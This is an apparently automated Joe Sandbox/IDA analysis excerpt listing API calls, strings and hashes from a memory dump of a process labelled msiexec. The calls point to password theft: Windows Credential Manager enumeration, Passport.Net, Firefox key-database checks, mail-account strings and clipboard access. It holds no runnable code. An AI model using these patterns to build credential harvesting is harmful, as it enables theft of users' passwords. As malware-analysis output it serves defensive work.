• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_mbscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3974772901-0
• Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
• Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
• Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
• Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
APIs
• wcslen.MSVCRT ref: 0044406C
• ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
• WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
• strlen.MSVCRT ref: 004440D1
  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
• memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
• ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
• String ID:
• API String ID: 577244452-0
• Opcode ID: 8e08044a2a4bc7e366d4504355b0cb20ffc498d5a3fe89b8b06fb4494e18d7f8
• Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
• Opcode Fuzzy Hash: 8e08044a2a4bc7e366d4504355b0cb20ffc498d5a3fe89b8b06fb4494e18d7f8
• Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
APIs
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
• _strcmpi.MSVCRT ref: 00404518
• _strcmpi.MSVCRT ref: 00404536
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: _strcmpi$memcpystrlen
• String ID: imap$pop3$smtp
• API String ID: 2025310588-821077329
• Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
• Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
• Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
• Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
APIs
• memset.MSVCRT ref: 0040C02D
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76230A60), ref: 00408EBE
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2726666094-3614832568
• Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
• Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
• Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
• Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
APIs
• memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
  • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
• memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
• memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
• memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: global-salt$password-check
• API String ID: 231171946-3927197501
• Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
• Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
APIs
• ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
• Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
• Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
• Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040644F
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                    Strings
                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                    • String ID: Passport.Net\*
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                    Strings
                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                    • String ID: Personalities
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • API ID: memset
                                                                                                    • String ID: H
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: winRead
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044955B
                                                                                                    • memset.MSVCRT ref: 0044956B
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                    Strings
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: gj
                                                                                                    APIs
                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                    • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                    • String ID:
APIs
• GetParent.USER32(?), ref: 004090C2
• GetWindowRect.USER32(?,?), ref: 004090CF
• GetClientRect.USER32(00000000,?), ref: 004090DA
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
• Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
• Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
• Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
APIs
  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
• SetBkMode.GDI32(?,00000001), ref: 0041079E
• GetSysColor.USER32(00000005), ref: 004107A6
• SetBkColor.GDI32(?,00000000), ref: 004107B0
• SetTextColor.GDI32(?,00C00000), ref: 004107BE
• GetSysColorBrush.USER32(00000005), ref: 004107C6
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: Color$BrushClassModeNameText_strcmpimemset
• String ID:
• API String ID: 2775283111-0
• Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
• Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
• Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
• Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: winSeekFile$winTruncate1$winTruncate2
• API String ID: 885266447-2471937615
• Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
• Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
• Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
• Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
APIs
• _strcmpi.MSVCRT ref: 0040E134
• _strcmpi.MSVCRT ref: 0040E14D
• _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: _strcmpi$_mbscpy
• String ID: smtp
• API String ID: 2625860049-60245459
• Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
• Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
• Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
• Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
APIs
• memset.MSVCRT ref: 0040C28C
• SetFocus.USER32(?,?), ref: 0040C314
  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: FocusMessagePostmemset
• String ID: S_@$l
• API String ID: 3436799508-4018740455
• Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
• Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
• Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
• Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: _mbscpy
• String ID: C^@$X$ini
• API String ID: 714388716-917056472
• Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
• Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
• Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
• Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
APIs
  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
• CreateFontIndirectA.GDI32(?), ref: 0040101F
• SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
• SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
• String ID: MS Sans Serif
• API String ID: 3492281209-168460110
• Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
• Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
• Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
• Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: ClassName_strcmpimemset
• String ID: edit
• API String ID: 275601554-2167791130
• Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
• Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
• Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
• Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: strlen$_mbscat
• String ID: 3CD
• API String ID: 3951308622-1938365332
• Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
• Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
• Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
• Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: rows deleted
• API String ID: 2221118986-571615504
• Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
• Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
• Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
• Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                    • memset.MSVCRT ref: 0040D319
                                                                                                    Similarity
